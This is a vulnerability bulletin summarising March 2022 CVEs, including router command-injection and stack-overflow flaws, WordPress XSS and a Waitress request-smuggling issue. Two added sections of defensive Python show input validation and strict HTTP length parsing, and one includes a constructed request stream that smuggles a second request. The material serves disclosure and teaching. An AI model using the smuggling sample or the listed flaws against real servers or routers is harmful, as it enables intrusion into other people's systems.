The Simple Quotation WordPress plugin through 1.3.2 does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them 2022-03-14 not yet calculated CVE-2022-22734
MISC
simple_tracking — simple_tracking
 
The Simple Tracking WordPress plugin before 1.7 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0700
MISC
singoocms — singoocms
 
This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter. 2022-03-17 not yet calculated CVE-2022-0749
MISC
MISC
MISC
slims8 — akasia
 
Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users. 2022-03-17 not yet calculated CVE-2021-45791
MISC
slims9 — bulian Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained. 2022-03-17 not yet calculated CVE-2021-45794
MISC
slims9 — bulian Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained. 2022-03-17 not yet calculated CVE-2021-45793
MISC
slims9 — bulian
 
Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php. 2022-03-17 not yet calculated CVE-2021-45792
MISC
snapcenter — snapcenter
 
SnapCenter versions prior to 4.5 are susceptible to a vulnerability which could allow a local authenticated attacker to discover plaintext HANA credentials. 2022-03-16 not yet calculated CVE-2022-23234
MISC
sonatype — nexus_repository_manager
 
Sonatype Nexus Repository Manager 3.36.0 allows HTML Injection. 2022-03-17 not yet calculated CVE-2021-43961
MISC
MISC
sourcecodester — attendance_and_payroll_system
 
An SQL Injection vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows a remote attacker to bypass authentication via unsanitized login parameters. 2022-03-17 not yet calculated CVE-2021-44088
MISC
MISC
MISC
spatie — media-library-pro_library
 
The Spatie media-library-pro library through 1.17.10 and 2.x through 2.1.6 for Laravel allows remote attackers to upload executable files via the uploads route. 2022-03-17 not yet calculated CVE-2021-45040
MISC
MISC
sqlpad — sqlpad
 
Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1. 2022-03-15 not yet calculated CVE-2022-0944
CONFIRM
MISC
star7th — showdoc Unrestricted Upload of File with Dangerous Type in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0950
CONFIRM
MISC
star7th — showdoc Stored XSS viva .webmv file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0964
MISC
CONFIRM
star7th — showdoc Stored XSS via File Upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0957
CONFIRM
MISC
star7th — showdoc Stored XSS via File Upload in GitHub repository star7th/showdoc prior to v.2.10.4. 2022-03-15 not yet calculated CVE-2022-0956
MISC
CONFIRM
star7th — showdoc Stored XSS via File Upload in star7th/showdoc in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0967
MISC
CONFIRM
star7th — showdoc Stored XSS viva .ofd file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0965
MISC
CONFIRM
star7th — showdoc File Upload Restriction Bypass leading to Stored XSS Vulnerability in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0951
MISC
CONFIRM
star7th — showdoc Stored XSS viva axd and cshtml file upload in star7th/showdoc in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-15 not yet calculated CVE-2022-0945
CONFIRM
MISC
star7th — showdoc Stored XSS viva .properties file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-14 not yet calculated CVE-2022-0960
CONFIRM
MISC
star7th — showdoc Stored XSS via File Upload in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.4.10. 2022-03-15 not yet calculated CVE-2022-0966
MISC
CONFIRM
star7th — showdoc
 
Stored XSS viva .webma file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-14 not yet calculated CVE-2022-0962
MISC
CONFIRM
star7th — showdoc
 
Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0942
MISC
CONFIRM
stb_trutype.h — stb_trutype.h stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25516
MISC
stb_trutype.h — stb_trutype.h stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttULONG() at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25515
MISC
stb_trutype.h — stb_trutype.h
 
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25514
MISC
stormshield — network_security
 
In Stormshield Network Security (SNS) before 3.7.25, 3.8.x through 3.11.x before 3.11.13, 4.x before 4.2.10, and 4.3.x before 4.3.5, a flood of connections to the SSLVPN service might lead to saturation of the loopback interface. This could result in the blocking of almost all network traffic, making the firewall unreachable. An attacker could exploit this via forged and properly timed traffic to cause a denial of service. 2022-03-15 not yet calculated CVE-2022-23989
MISC
suse — linux_enterprise_server
 
A Insecure Temporary File vulnerability in grub-once of grub2 in SUSE Linux Enterprise Server 15 SP4, openSUSE Factory allows local attackers to truncate arbitrary files. This issue affects: SUSE Linux Enterprise Server 15 SP4 grub2 versions prior to 2.06-150400.7.1. SUSE openSUSE Factory grub2 versions prior to 2.06-18.1. 2022-03-16 not yet calculated CVE-2021-46705
CONFIRM
sylius — sylius Sylius is an open source eCommerce platform. Prior to versions 1.10.11 and 1.11.2, the reset password token was not set to null after the password was changed. The same token could be used several times, which could result in leak of the existing token and unauthorized password change. The issue is fixed in versions 1.10.11 and 1.11.2. As a workaround, overwrite the `SyliusBundleApiBundleCommandHandlerResetPasswordHandler` class with code provided by the maintainers and register it in a container. More information about this workaround is available in the GitHub Security Advisory. 2022-03-14 not yet calculated CVE-2022-24743
MISC
CONFIRM
MISC
sylius — sylius Sylius is an open source eCommerce platform. In versions prior to 1.9.10, 1.10.11, and 1.11.2, it is possible to upload an SVG file containing cross-site scripting (XSS) code in the admin panel. In order to perform a XSS attack, the file itself has to be open in a new card or loaded outside of the IMG tag. The problem applies both to the files opened on the admin panel and shop pages. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. As a workaround, require a library that adds on-upload file sanitization and overwrite the service before writing the file to the filesystem. The GitHub Security Advisory contains more specific information about the workaround. 2022-03-14 not yet calculated CVE-2022-24749
CONFIRM
MISC
MISC
MISC
sylius — sylius
 
Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, it is possible for a page controlled by an attacker to load the website within an iframe. This will enable a clickjacking attack, in which the attacker’s page overlays the target application’s interface with a different interface provided by the attacker. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. Every response from app should have an X-Frame-Options header set to: “sameorigin“. To achieve that, add a new `subscriber` in the app. 2022-03-14 not yet calculated CVE-2022-24733
CONFIRM
MISC
MISC
MISC
sylius — sylius
 
Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, any other user can view the data if browser tab remains unclosed after log out. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. The application must strictly redirect to login page even browser back button is pressed. Another possibility is to set more strict cache policies for restricted content. 2022-03-14 not yet calculated CVE-2022-24742
MISC
CONFIRM
MISC
MISC
sylius — sylius
 
SyliusGridBundle is a package of generic data grids for Symfony applications. Prior to versions 1.10.1 and 1.11-rc2, values added at the end of query sorting were passed directly to the database. The maintainers do not know if this could lead to direct SQL injections but took steps to remediate the vulnerability. The issue is fixed in versions 1.10.1 and 1.11-rc2. As a workaround, overwrite the`SyliusComponentGridSortingSorter.php` class and register it in the container. More information about this workaround is available in the GitHub Security Advisory. 2022-03-15 not yet calculated CVE-2022-24752
MISC
CONFIRM
MISC
MISC
MISC
syltek — syltek
 
Syltek application before its 10.22.00 version, does not correctly check that a product ID has a valid payment associated to it. This could allow an attacker to forge a request and bypass the payment system by marking items as payed without any verification. 2022-03-18 not yet calculated CVE-2021-4031
CONFIRM
sync_qcloud_cos — sync_qcloud_cos
 
The Sync QCloud COS WordPress plugin before 2.0.1 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0659
MISC
sysend.js — sysend.js
 
sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messages. 2022-03-14 not yet calculated CVE-2022-24762
CONFIRM
MISC
MISC
MISC
taocms — taocms
 
taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file. 2022-03-18 not yet calculated CVE-2022-25578
MISC
MISC
team_circle_image_slider_with_lightbox — team_circle_image_slider_with_lightbox
 
The Team Circle Image Slider With Lightbox WordPress plugin before 1.0.16 does not sanitize and escape the order_pos parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 2022-03-14 not yet calculated CVE-2022-0648
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the deviceId parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25428
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25427
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a buffer overflow via the time parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25429
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain multiple stack overflows via the NPTR, V12, V10 and V11 parameter in the Formsetqosband function. 2022-03-18 not yet calculated CVE-2022-25431
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the urls parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25433
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the firewallen parameter in the SetFirewallCfg function. 2022-03-18 not yet calculated CVE-2022-25434
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function. 2022-03-18 not yet calculated CVE-2022-25437
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetStaticRoutecfg function. 2022-03-18 not yet calculated CVE-2022-25435
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the SetIPTVCfg function. 2022-03-18 not yet calculated CVE-2022-25438
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function. 2022-03-18 not yet calculated CVE-2022-25455
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedstarttime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25446
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the day parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25448
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the deviceId parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25449
MISC
tenda — routers Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function. 2022-03-18 not yet calculated CVE-2022-25450
MISC
tenda — routers Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the setstaticroutecfg function. 2022-03-18 not yet calculated CVE-2022-25451
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the URLs parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25452
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25453
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the loginpwd parameter in the SetFirewallCfg function. 2022-03-18 not yet calculated CVE-2022-25454
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the security_5g parameter in the WifiBasicSet function. 2022-03-18 not yet calculated CVE-2022-25456
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function. 2022-03-18 not yet calculated CVE-2022-25439
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the PowerSaveSet function. 2022-03-18 not yet calculated CVE-2022-25445
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25457
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the cmdinput parameter in the exeCommand function. 2022-03-18 not yet calculated CVE-2022-25458
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the S1 parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25459
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the endip parameter in the SetPptpServerCfg function. 2022-03-18 not yet calculated CVE-2022-25460
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the vlanid parameter in the SetIPTVCfg function. 2022-03-18 not yet calculated CVE-2022-25441
MISC
tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25440
MISC
tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25447
MISC
tenda — routers
 
Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function. 2022-03-18 not yet calculated CVE-2022-25461
MISC
tibco — multiple_products
 
The Server component of TIBCO Software Inc.’s TIBCO JasperReports Library, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, TIBCO JasperReports Server for ActiveMatrix BPM, and TIBCO JasperReports Server for Microsoft Azure contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. Affected releases are TIBCO Software Inc.’s TIBCO JasperReports Library: version 7.9.0, TIBCO JasperReports Library for ActiveMatrix BPM: version 7.9.0, TIBCO JasperReports Server: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for AWS Marketplace: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.9.0 and 7.9.1, and TIBCO JasperReports Server for Microsoft Azure: version 7.9.1. 2022-03-15 not yet calculated CVE-2022-22771
CONFIRM
CONFIRM
tiny_file_manager — tiny_file_manager
 
A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution. 2022-03-15 not yet calculated CVE-2021-45010
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
tinyfilemanager — tinyfilemanager
 
Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7. 2022-03-17 not yet calculated CVE-2022-1000
MISC
CONFIRM
totlink — routers
 
CVE-2022-26214 (published 2022-03-15; CVSS not yet calculated). Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function NTPSyncWithHost. This vulnerability allows attackers to execute arbitrary commands via the host_time parameter.

totolink — firmware
CVE-2022-26213 (published 2022-03-15; CVSS not yet calculated). Totolink X5000R_Firmware v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function setNtpCfg, via the tz parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-26209 (published 2022-03-15; CVSS not yet calculated). Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUploadSetting, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-26207 (published 2022-03-15; CVSS not yet calculated). Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDiagnosisCfg, via the ipDoamin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-27003 (published 2022-03-15; CVSS not yet calculated). Totolink routers X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6rd function via the relay6rd parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-27004 (published 2022-03-15; CVSS not yet calculated). Totolink routers X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6in4 function via the remote6in4 parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-26211 (published 2022-03-15; CVSS not yet calculated). Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function CloudACMunualUpdate, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-26206 (published 2022-03-15; CVSS not yet calculated). Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setLanguageCfg, via the langType parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-26208 (published 2022-03-15; CVSS not yet calculated). Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setWebWlanIdx, via the webWlanIdx parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-26210 (published 2022-03-15; CVSS not yet calculated). Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUpgradeFW, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-27005 (published 2022-03-15; CVSS not yet calculated). Totolink routers X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the setWanCfg function via the hostName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

totolink — routers
CVE-2022-26212 (published 2022-03-15; CVSS not yet calculated). Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDeviceName, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.
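The Totolink entries above share one bug class: a request parameter (an NTP host, a time zone, a file name, a device name) reaches a shell command line without validation. The following is an added illustration of that class and of the usual fix, written for this page; it is not Totolink's firmware code. The `ntpdate` command line, the `host_time` parameter name and the sample inputs are assumptions made for the example, since the advisory text does not show the real handler.

```python
"""Command-injection sink versus allow-list validation plus argv execution.

Added illustration for this page, not Totolink's code.  The ntpdate command
line and the host_time parameter name are assumed; the firmware's actual
handler is not shown in the advisory text.
"""
import ipaddress
import re
import subprocess
from typing import Callable, List

# One DNS label per RFC 1123: 1-63 alphanumerics or hyphens, no leading or
# trailing hyphen.  Shell metacharacters (; | & $ ` ( ) space ...) never match.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def is_valid_host(value: str) -> bool:
    """Accept an IPv4/IPv6 literal or an RFC 1123 hostname; reject everything else."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.fullmatch(label) for label in labels)


def vulnerable_ntp_command(host_time: str) -> str:
    """The sink the advisory describes: the parameter is pasted into a command
    string that is then handed to a shell (system(3) style), so any shell
    metacharacters in host_time become additional commands."""
    return "ntpdate " + host_time


def hardened_ntp_command(host_time: str) -> List[str]:
    """Validate first, then build an argv list so no shell ever sees the value."""
    if not is_valid_host(host_time):
        raise ValueError(f"rejected NTP host: {host_time!r}")
    return ["ntpdate", host_time]


def run_ntp_sync(host_time: str, runner: Callable = subprocess.run):
    """Execute the hardened command with shell=False.  `runner` is injectable
    so the call path can be exercised without running ntpdate for real."""
    argv = hardened_ntp_command(host_time)
    return runner(argv, shell=False, check=False, capture_output=True, timeout=10)


def rejects(fn: Callable, value: str) -> bool:
    """True if fn raises ValueError for value (used by the checks below)."""
    try:
        fn(value)
    except ValueError:
        return True
    return False
```

The validator is an allow-list, not a deny-list of metacharacters: anything that is not a well-formed host literal is refused, which also covers encodings and whitespace tricks that a blacklist would miss. Passing the value as a separate argv element with `shell=False` is the second, independent layer; in C firmware the equivalent is `execve(2)` with an argument vector instead of `system(3)`.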
unisoc — chipset
CVE-2022-27250 (published 2022-03-18; CVSS not yet calculated). The UNISOC chipset through 2022-03-15 allows attackers to obtain remote control of a mobile phone, e.g., to obtain sensitive information from text messages or the device's screen, record video of the device's physical environment, or modify data.
veeam — agent_for_windows
CVE-2022-26503 (published 2022-03-17; CVSS not yet calculated). Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with LOCAL SYSTEM privileges.

veeam — backup_and_replication
CVE-2022-26502 (published 2022-03-18; CVSS not yet calculated). **REJECT** Veeam Backup & Replication 10.x and 11.x has an Untrusted Search Path.

veeam — backup_and_replication
CVE-2022-26501 (published 2022-03-17; CVSS not yet calculated). Veeam Backup & Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2).

veeam — backup_and_replication
CVE-2022-26500 (published 2022-03-17; CVSS not yet calculated). Improper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4, 10.x, and 11.x allows remote authenticated users to reach internal API functions, which lets attackers upload and execute arbitrary code.

veeam — backup_and_replication
CVE-2022-26504 (published 2022-03-17; CVSS not yet calculated). Improper authentication in the Veeam Backup & Replication 9.5U3, 9.5U4, 10.x, and 11.x component used for Microsoft System Center Virtual Machine Manager (SCVMM) allows attackers to execute arbitrary code via Veeam.Backup.PSManager.exe.
vim — vim
CVE-2022-0943 (published 2022-03-14; CVSS not yet calculated). Heap-based buffer overflow in vim (GitHub repository vim/vim) prior to 8.2.4563.
volto — volto
CVE-2022-24740 (published 2022-03-14; CVSS not yet calculated). Volto is a ReactJS-based frontend for the Plone Content Management System. Between versions 14.0.0-alpha.5 and 15.0.0-alpha.0, a user could have their authentication cookie replaced with the authentication cookie of another user, effectively giving them control of the other user's account and privileges. This occurs when an outdated version of the `react-cookie` library is in use and the server is under high load. No proof of concept currently exists, but the issue can occur in the wild. The fix is included in Volto 15.0.0-alpha.0. As a workaround, one may manually upgrade the `react-cookie` package to 4.1.1 and then override all Volto components that use this library.
voting_contest — voting_contest
CVE-2022-0321 (published 2022-03-14; CVSS not yet calculated). The WP Voting Contest WordPress plugin through 2.1 does not sanitise and escape the post_id parameter before outputting it back in the response via the wpvc_social_share_icons AJAX action (available to both unauthenticated and authenticated users), leading to a reflected cross-site scripting issue.
waitress — waitress
CVE-2022-24761 (published 2022-03-17; CVSS not yet calculated). Waitress is a Web Server Gateway Interface (WSGI) server for Python 2 and 3. When Waitress 2.1.0 or earlier runs behind a proxy that does not properly validate that incoming HTTP requests conform to RFC 7230, Waitress and the front-end proxy may disagree on where one request starts and where it ends. This allows requests to be smuggled through the front-end proxy to Waitress and alters subsequent behaviour. Two classes of issue that can lead to request smuggling are addressed by this advisory: the use of Python's `int()` to parse strings into integers, which causes `+10` to be parsed as `10` and `0x01` to be parsed as `1`, whereas the standard specifies that the string must contain only digits or hex digits; and the fact that Waitress does not support chunk extensions yet discarded them without validating that they contained no illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available: when deploying a proxy in front of Waitress, turn on any and all functionality that ensures requests match RFC 7230. Certain proxy servers may not have this functionality, so users are encouraged to upgrade to the latest version of Waitress instead.
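To make the two parsing gaps concrete, here is an added example (written for this page, not Waitress's own code) that puts Python's permissive `int()` next to parsers that enforce the RFC 7230 grammar for Content-Length, chunk-size and chunk extensions, and then shows how two parsers that disagree on a length cut the same byte stream at different places. The pipelined request stream at the bottom is constructed for the example; the quoted-string grammar is restricted to ASCII here.

```python
"""Strict RFC 7230 framing versus Python's permissive int().

Added illustration of the two parsing gaps described in the Waitress entry;
it is not Waitress's code.  The grammar fragments follow RFC 7230:
Content-Length = 1*DIGIT, chunk-size = 1*HEXDIG, chunk-ext names are tokens
and chunk-ext values are tokens or quoted-strings (ASCII only here).
"""
import re
from typing import Callable, List, Tuple

_DIGITS = re.compile(r"[0-9]+")
_HEXDIGITS = re.compile(r"[0-9A-Fa-f]+")
_TCHAR = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]"          # tchar, RFC 7230 section 3.2.6
_QUOTED = r'"(?:[\t \x21\x23-\x5b\x5d-\x7e]|\\[\t \x20-\x7e])*"'
_CHUNK_EXT = re.compile(r";" + _TCHAR + r"+(?:=(?:" + _TCHAR + r"+|" + _QUOTED + r"))?")


def lenient_content_length(value: str) -> int:
    """int() accepts a sign, surrounding whitespace, digit-group underscores
    and non-ASCII decimal digits; RFC 7230 allows none of them."""
    return int(value)


def lenient_chunk_size(value: str) -> int:
    """int(value, 16) additionally accepts a 0x prefix, a sign and whitespace."""
    return int(value, 16)


def strict_content_length(value: str) -> int:
    """Content-Length = 1*DIGIT; anything else is a malformed message."""
    if not _DIGITS.fullmatch(value):
        raise ValueError(f"invalid Content-Length: {value!r}")
    return int(value)


def strict_chunk_size(line: str) -> int:
    """Parse one chunk-size line (CRLF already removed):
    chunk-size *( ";" chunk-ext-name [ "=" chunk-ext-val ] ).
    Extensions are still ignored, but only after they pass the grammar."""
    size = _HEXDIGITS.match(line)
    if not size:
        raise ValueError(f"invalid chunk-size: {line!r}")
    pos = size.end()
    while pos < len(line):
        ext = _CHUNK_EXT.match(line, pos)
        if not ext:
            raise ValueError(f"invalid chunk-ext at offset {pos}: {line!r}")
        pos = ext.end()
    return int(size.group(), 16)


def split_pipeline(raw: bytes, parse_length: Callable[[str], int]) -> List[Tuple[bytes, bytes]]:
    """Cut a stream of pipelined requests into (head, body) pairs, using
    parse_length for Content-Length.  A proxy and a backend that disagree on
    parse_length cut the same bytes at different places; that disagreement is
    the request smuggling condition the advisory describes."""
    out = []
    while raw:
        head, sep, rest = raw.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("incomplete request head")
        length = 0
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = parse_length(value.strip().decode("ascii"))
        out.append((head, rest[:length]))
        raw = rest[length:]
    return out


def rejects(fn: Callable, value) -> bool:
    """True if fn raises ValueError for value (used by the checks below)."""
    try:
        fn(value)
    except ValueError:
        return True
    return False


# Constructed sample: a POST whose Content-Length carries a sign, followed by
# a second request on the same connection.  A lenient parser swallows the
# first five bytes of the second request as the POST body; a strict parser
# refuses the message outright.
SAMPLE_STREAM = (
    b"POST /a HTTP/1.1\r\nHost: example.test\r\nContent-Length: +5\r\n\r\n"
    b"GET /b HTTP/1.1\r\nHost: example.test\r\n\r\n"
)
```

The practical check for any HTTP front end or back end is the same: a framing field that does not match the grammar character for character must make the whole message fail, never be "repaired" into a number. Rejecting is what keeps every hop on the path agreeing about request boundaries.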
wavlink — routers
